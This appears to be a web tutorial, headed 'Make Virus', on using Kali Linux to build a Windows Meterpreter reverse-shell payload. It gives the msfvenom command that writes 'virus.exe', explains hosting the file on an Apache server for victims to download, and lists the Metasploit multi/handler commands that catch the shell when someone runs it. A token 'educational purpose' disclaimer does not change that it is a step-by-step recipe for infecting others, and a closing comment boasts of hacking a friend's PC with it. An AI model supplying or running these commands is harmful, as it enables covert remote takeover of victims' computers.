Make Virus
Make virus file (Malware) | Hack victim PC | Hack system by sending virus.
Make virus Malware |
This video is for educational purpose. Don't use it for bad purpose.
I will not responsible for any bad and illegal activity.
First of all, open the terminal of the Kali Linux.
After opening the terminal, we need to make a payload. We write
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 --format=exe > /root/Desktop/virus.exe
It creates a virus file in the root folder.
Here you need to check your IP Address. So, we open a new terminal from Ctrl Shift + N. After checking the IP Address close this terminal.
Copy virus.exe file from Desktop to /var/www/html folder
After copy the virus file close that window.
Now, open a new terminal and run the apache service. This makes an online server where from we download the virus file.
service apache2 start service postgresql start
After running apache service, you need to open the MetaSploit Framework
After the opening of msfconsole, use these highlighted command.
use exploit/multi/handler
Then, set payload
set payload windows/meterpreter/reverse_tcp
After setting payload, set your LHOST
After setting the LHOST, set your LPORT.
set LPORT 4444
After you set your LPORT, you need to exploit it
meterpreter_> help
These are all commands that will show on the terminal when you write help command after the meterpreter session has been started.
If someone open this link and run it as administrator the meterpreter session has been started.
You can check all the commands by typing help command.
You can download this virus file by typing "Your IP/File Name" in your chrome and any search engine search bar.
There are some important points that helps you in writing the commands.
You will need to take care of lower case and upper case letters in commands. Take care of spaces, dashes, hyphens, slashes and underscores.
Great. I use it and hack my friends pc by sending virus file. It's working.